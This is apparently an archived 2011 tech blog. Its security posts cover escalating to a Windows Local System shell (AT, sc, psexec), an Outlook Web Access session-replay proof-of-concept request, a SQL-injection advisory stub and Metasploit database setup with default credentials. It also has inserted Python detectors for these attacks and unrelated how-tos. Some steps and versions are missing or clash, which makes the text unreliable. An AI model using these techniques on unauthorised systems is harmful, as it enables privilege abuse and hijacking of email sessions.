Wednesday, December 21, 2011

Run CMD.exe as Local System Account

Strike 1:

I found information online which suggests launching CMD.exe using the DOS Task Scheduler AT command. Here’s a sample command:

AT 12:00 /interactive cmd.exe

I gave it a shot but I received a Vista warning that “due to security enhancements, this task will run at the time expected but not interactively.”

It turns out that this approach works for XP, 2000 and Server 2003, but due to session 0 isolation interactive services no longer work on Windows Vista and Windows Server 2008.

Strike 2:

Another solution suggested creating a secondary Windows service via the Service Control utility (sc.exe) which merely launches CMD.exe:

C:\> sc create RunCMDAsLSA binpath= "cmd" type=own type=interact
C:\> sc start RunCMDAsLSA

In this case the service fails to start and results in the following error message:

FAILED 1053: The service did not respond to the start or control request in a timely fashion.

Strike 3:

The third suggestion was to launch CMD.exe via a Scheduled Task. Though you may run scheduled tasks under various accounts, I don’t believe the Local System Account is one of them. I’ve tried using runas as well, but I think I’m running into the same restriction as with a scheduled task.

Not Out Yet:

Fortunately, I came across this article which demonstrates the use of PsTools from Sysinternals, which was acquired by Microsoft in July 2006. I launched the command line, issued the following statement, and suddenly I was running under the Local System Account like magic:

psexec -i -s cmd.exe

PSTools worked great. It’s a lightweight, well-documented set of tools which provided an appropriate solution to my problem.

How to gain access to the System account, the most powerful account in Windows.

Don’t follow the procedure below if you don’t know what you are doing. You may harm your PC. If you follow it, do so at your own risk.

1) Check the name of the account you’re logged into (click Start; you will see the name of the account you’ve logged in with).

2) Launch the command prompt (Start | Run | cmd | [Enter]).
In the command prompt, create a schedule to run cmd.exe. To create the schedule, type the following line and hit Enter:
at 10:41 /interactive “cmd.exe”
This will create a schedule to run cmd.exe at 10:41. (Since you are testing, check the time on your system and add two or three minutes; change this time according to your local time.)
Hint: you can check that the schedule is in place by typing “at” and hitting Enter after the above step.

3) Wait for the time you set for the schedule. cmd.exe will be launched at the specified time.

4) After cmd.exe is launched at the scheduled time, press [CTRL] + [ALT] + [DEL] and launch Task Manager.
Select the “Processes” tab, select explorer.exe in the process list and click the “End Process” button.
You will receive a confirmation dialogue; click “Yes” to end the process.

5) Close Task Manager by clicking the close (X) button.
Close the first cmd window (be careful to close the first one, not the second one).
Now you have only the second command prompt window and an empty desktop.
In the command prompt type the following line and hit Enter:
cd ..

6) In the command prompt type the following line and hit Enter.
If this is the first time you do this, Windows creates the necessary components for you to access System (desktop, Start menu, My Documents).
When it’s finished you will have a new desktop.

7) Close the command prompt window. Click Start and check your username; it has changed to System. Now you are a super-power user. Be careful not to harm your PC by deleting or modifying system files if you don’t know what you are doing.

I am once again saying: don’t attempt to access the System account unless you are an experienced Windows user.
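Each of the techniques above leaves a trace a defender can alert on: the AT job and psexec -i -s both end up with a shell running as Local System, psexec installs its PSEXESVC service first, and the sc create variant registers a service whose binary is cmd.exe. The block below is an added example, not code from this post or from Sysinternals. It classifies constructed records shaped like the Windows System log event 7045 (a service was installed) and the Security log event 4688 (a new process was created), reporting a service whose binary is a command shell, a PsExec service install, and a shell running under the Local System SID (S-1-5-18) whose parent is a service or scheduler host. The sample records and the parent-process list are assumptions made for the example.

```python
import ntpath

# Constructed sample events (not real logs). They mimic the fields of
# event 7045 (service installed) and event 4688 (process created).
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "RunCMDAsLSA", "ImagePath": "cmd",
     "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "PSEXESVC",
     "ImagePath": r"C:\Windows\PSEXESVC.exe", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "Spooler",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe", "AccountName": "LocalSystem"},
    {"EventID": 4688, "SubjectUserSid": "S-1-5-18",
     "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "ParentProcessName": r"C:\Windows\PSEXESVC.exe"},
    {"EventID": 4688, "SubjectUserSid": "S-1-5-18",
     "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "ParentProcessName": r"C:\Windows\System32\taskeng.exe"},
    {"EventID": 4688, "SubjectUserSid": "S-1-5-21-1000-2000-3000-1001",  # constructed user SID
     "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "ParentProcessName": r"C:\Windows\explorer.exe"},
    {"EventID": 4688, "SubjectUserSid": "S-1-5-18",
     "NewProcessName": r"C:\Windows\System32\svchost.exe",
     "ParentProcessName": r"C:\Windows\System32\services.exe"},
]

LOCAL_SYSTEM_SID = "S-1-5-18"          # well-known SID of the Local System account
SHELLS = {"cmd.exe", "powershell.exe"}
# Parents that launch a SYSTEM shell the way the post's techniques do: the SCM
# (sc create ... binpath= "cmd"), the PsExec service, and the Task Scheduler
# hosts (AT / scheduled tasks). svchost.exe is noisy; tune this list per site.
SERVICE_PARENTS = {"services.exe", "psexesvc.exe", "taskeng.exe", "svchost.exe"}


def exe_name(path):
    """Lower-case file name of a Windows path or command string; 'cmd' -> 'cmd.exe'."""
    name = ntpath.basename(path.strip().strip('"')).lower()
    if name and not name.endswith(".exe"):
        name += ".exe"
    return name


def classify(event):
    """Return the findings for one event (empty list when nothing is notable)."""
    findings = []
    if event.get("EventID") == 7045:
        image = exe_name(event.get("ImagePath", ""))
        if image in SHELLS:
            findings.append(f"service {event['ServiceName']} has a command shell as its binary")
        if event.get("ServiceName", "").upper() == "PSEXESVC" or image == "psexesvc.exe":
            findings.append("PsExec service installed")
    elif event.get("EventID") == 4688:
        child = exe_name(event.get("NewProcessName", ""))
        parent = exe_name(event.get("ParentProcessName", ""))
        if (event.get("SubjectUserSid") == LOCAL_SYSTEM_SID
                and child in SHELLS and parent in SERVICE_PARENTS):
            findings.append(f"Local System shell {child} spawned by {parent}")
    return findings


def scan(events):
    """Map the index of every notable event to its findings."""
    hits = {}
    for i, event in enumerate(events):
        findings = classify(event)
        if findings:
            hits[i] = findings
    return hits


if __name__ == "__main__":
    for i, findings in scan(SAMPLE_EVENTS).items():
        print(i, "; ".join(findings))
```

Run against the sample, events 0, 1, 3 and 4 are reported: the shell-as-service install, the PsExec service, and the two Local System shells spawned by PSEXESVC.exe and the scheduler host; the user's own cmd.exe under explorer.exe and the ordinary svchost.exe start are left alone.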

Tuesday, November 22, 2011

Microsoft Outlook Web Access Session Replay Security Bypass Vulnerability

Detail of POC can be viewed

Microsoft Outlook Web Access is prone to a security-bypass vulnerability.

Successful exploits may allow attackers to hijack web sessions or bypass authentication through a replay attack and gain access to a victim's email account.

Microsoft Outlook Web Access is vulnerable; other versions may also be affected.

An attacker can carry out this attack using readily available network utilities.

The following proof of concept is available:

GET /owa/?ae=Folder&t=IPF.Note&a= HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application,
application/, application/xaml+xml, application/x-ms-xbap,
application/x-shockwave-flash, application/,
application/, application/msword, application/x-mfe-ipt,
Accept-Language: en-in
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0;
SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR
3.5.30729; FDM; .NET CLR 3.0.30729; .NET4.0C)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Cookie: sessionid=49307edc-0f26-4dae-95f8-02d3dc6ad8a3:000;
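A replay of the sessionid cookie shown above is only visible on the server side if session ids are correlated across requests. The following is an added example, not part of the advisory or of any Microsoft code: it parses a few constructed log lines in a hypothetical format, pulls the sessionid out of a Cookie header written the way the captured request writes it (trailing semicolon included), and flags a session id that is presented from a second client (IP and User-Agent pair) or that is still used after the session already sent a logoff request. The log format, the field names and the session values are assumptions made for the example.

```python
import shlex
from collections import defaultdict

# Constructed session ids and log lines (hypothetical format, not real OWA or
# IIS output). Each line is: date time client_ip method uri "user-agent" cookie
SESSION_A = "11111111-1111-1111-1111-111111111111:000"
SESSION_B = "22222222-2222-2222-2222-222222222222:000"
IE8 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)"
SAMPLE_LOG = f'''\
2011-11-22 10:00:01 10.0.0.5 GET /owa/?ae=Folder&t=IPF.Note "{IE8}" sessionid={SESSION_A};
2011-11-22 10:00:09 10.0.0.5 GET /owa/?ae=Item&t=IPM.Note "{IE8}" sessionid={SESSION_A};
2011-11-22 10:03:40 10.0.0.5 GET /owa/logoff.owa "{IE8}" sessionid={SESSION_A};
2011-11-22 10:05:12 192.0.2.77 GET /owa/?ae=Folder&t=IPF.Note "Mozilla/5.0 (X11; Linux x86_64)" sessionid={SESSION_A};
2011-11-22 10:06:00 10.0.0.9 GET /owa/?ae=Folder&t=IPF.Note "{IE8}" sessionid={SESSION_B};
'''


def parse_cookie_header(value):
    """Turn 'a=1; b=2;' into a dict; tolerates the trailing ';' of the captured request."""
    cookies = {}
    for part in value.split(";"):
        if "=" in part:
            name, val = part.strip().split("=", 1)
            cookies[name] = val
    return cookies


def parse_log(text):
    """Parse the constructed log format into a list of request dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        date, time_, ip, method, uri, ua, cookie = shlex.split(line)
        events.append({"ts": f"{date} {time_}", "ip": ip, "method": method, "uri": uri,
                       "ua": ua, "session": parse_cookie_header(cookie).get("sessionid")})
    return events


def sessions_with_multiple_clients(events):
    """Session id -> set of (ip, user-agent) pairs, for ids seen from more than one client."""
    clients = defaultdict(set)
    for e in events:
        if e["session"]:
            clients[e["session"]].add((e["ip"], e["ua"]))
    return {sid: c for sid, c in clients.items() if len(c) > 1}


def requests_after_logoff(events):
    """Requests that reuse a session id after that session already sent a logoff request."""
    logged_off = set()
    suspicious = []
    for e in sorted(events, key=lambda e: e["ts"]):   # ISO timestamps sort as text
        if e["session"] in logged_off:
            suspicious.append(e)
        if e["uri"].lower().startswith("/owa/logoff.owa"):
            logged_off.add(e["session"])
    return suspicious


if __name__ == "__main__":
    events = parse_log(SAMPLE_LOG)
    for sid, clients in sessions_with_multiple_clients(events).items():
        print("session", sid, "seen from", sorted(clients))
    for e in requests_after_logoff(events):
        print("post-logoff reuse:", e["ts"], e["ip"], e["uri"])
```

On the sample, SESSION_A is reported twice: once because it arrives from a second client (192.0.2.77 with a different User-Agent) and once because that request comes after the session's own logoff. Either signal alone is worth a look; both together on the same id is the replay the advisory describes.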

SonicWALL Aventail 'CategoryID' Parameter SQL Injection Vulnerability

Detail of POC can be viewed

SonicWALL Aventail is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

Attackers can use a browser to exploit this issue.

The following example URI is available:[SQL]

Sunday, September 11, 2011

Turning Firefox into an Ethical Hacking Platform

Information gathering

Whois and geo-location
ShowIP: Shows the IP address of the current page in the status bar. It also allows querying custom services by IP (right mouse button) and hostname (left mouse button), such as whois and Netcraft.

Shazou: Shazou (pronounced “Shazoo”; it is Japanese for “mapping”) enables the user to map and geo-locate, with one click, any website they are currently viewing.
Geolocation: Displays geolocation information for a website using data. Works with all versions of Firefox.

Active Whois: Start Active Whois to get details about any website owner and its host server.
Bibirmer Toolbar: An all-in-one extension, but auditors need to play with the toolbox. It includes WhoIs, DNS Report, Geolocation, Traceroute and Ping. Very useful for the information gathering phase.

Enumeration / fingerprinting
Header Spy: Shows HTTP headers on the status bar.
Header Monitor: A Firefox extension that displays, in a status bar panel, any HTTP response header of the top-level document returned by the web server. Examples: Server (by default), Content-Encoding, Content-Type, X-Powered-By and others.

Social engineering
People Search and Public Record: This Firefox extension is a handy menu tool for investigators, reporters, legal professionals, real estate agents, online researchers and anyone interested in doing their own basic people searches and public record lookups as well as background research.

Googling and spidering
Advanced Dork: Gives quick access to Google’s advanced operators directly from the context menu. This could be used to scan for hidden files or narrow in on a target anonymously (via the option). [Updated definition; thanks to CP, author of Advanced Dork]

SpiderZilla: Spiderzilla is an easy-to-use website mirror utility, based on HTTrack from

View Dependencies: Adds a tab to the “Page Info” window which lists all the files that were loaded to show the current page (useful as a spidering technique).

Sunday, May 22, 2011

Running Multiple Instances of Google Talk

Open Multiple GTalk Instances
First find out where your GTalk is installed. This would usually be:

C:\Program Files\Google\Google Talk\googletalk.exe

Once you have found out where your Google Talk is,
• Create a shortcut by right-clicking on your desktop and choosing Shortcut.
• Browse to and choose the location of the file and add “/nomutex” at the end of the location, so your path looks like this:
“C:\Program Files\Google\Google Talk\googletalk.exe” /nomutex

That’s it. Now click on your usual link to open GTalk and log in. Then click on the new shortcut that you created to open the second Google Talk instance.

Backtrack db_driver mysql problem Error

1) # apt-get install libmysqlclient-dev

2) # start mysql   or   # /etc/init.d/mysql start

3) # mysql -u root -p'toor'   // by default the password is toor

4) mysql> create database metasploit3;   // mysql> create database ;

6) mysql> grant all privileges on metasploit3.* to root@localhost;
mysql> exit

7) # update-alternatives --config ruby

then choose selection number 0

8) # ruby -v   // check the ruby version; it should be ruby 1.8.7

9) # gem install mysql

10) # ruby1.8 /pentest/exploits/framework3/msfconsole   // start msfconsole with ruby1.8 every time you open it

11) msf > db_driver mysql

12) msf > db_connect root:toor@

13) msf > db_status

14) msf > db_nmap -sS -n   // check whether it is working


Wednesday, April 27, 2011

Insert Images into Your Gmail Messages

Well, it's around 3am. One of my friends asked how to insert an image in Gmail.

Solution: To put images into your messages (or attach images you want to inline), just turn on "Inserting images" from the Labs tab under Settings.

Make sure you're in rich formatting mode, or the option won't show up. Click the little image icon, and you can insert images in two ways: by uploading image files from your computer or by providing image URLs.

Gmail doesn't show URL-based images in messages by default to protect you from spammers, so if you're sending mail to other Gmail users, they'll still have to click "Display images below" or "Always display images from ..." to see images you embed.

Tuesday, February 15, 2011

Compile Linux kernel 2.6

Step # 1 Get Latest Linux kernel code

Visit and download the latest source code. The file name will be linux-x.y.z.tar.bz2, where x.y.z is the actual version number.

root@asheesh# cd /tmp

Step # 2 Extract tar (.tar.bz2) file

root@asheesh# tar -xjvf linux-2.6.25.tar.bz2 -C /usr/src
root@asheesh# cd /usr/src

Step # 3 Configure kernel
root@asheesh# apt-get install gcc   (if gcc is not installed)
root@asheesh# make menuconfig

Step # 4 Compile kernel

Start compiling to create a compressed kernel image:
root@asheesh# make

Then compile and install the kernel modules:
root@asheesh# make modules
root@asheesh# make modules_install

Step # 5 Install kernel

Install the compiled kernel (the modules were installed by make modules_install above):
root@asheesh# make install

Step # 6: Create an initrd image

Type the following command at a shell prompt:
root@asheesh# cd /boot
root@asheesh# mkinitrd -o initrd.img-2.6.37 2.6.37

Step # 7 Modify Grub configuration file

- /boot/grub/menu.lst (take a backup before editing)

Open file using vi or gedit:
root@asheesh# vi /boot/grub/menu.lst

title Debian GNU/Linux, kernel 2.6.25 Default
root (hd0,0)
kernel /boot/vmlinuz root=/dev/hdb1 ro
initrd /boot/initrd.img-2.6.25

Remember to set the correct root=/dev/hdXX device. Save and close the file. If you think editing and writing all the lines by hand is too much for you, try the update-grub command, which updates the lines for each kernel in the /boot/grub/menu.lst file.

Step # 8 : Reboot computer and boot into your new kernel

root@asheesh# reboot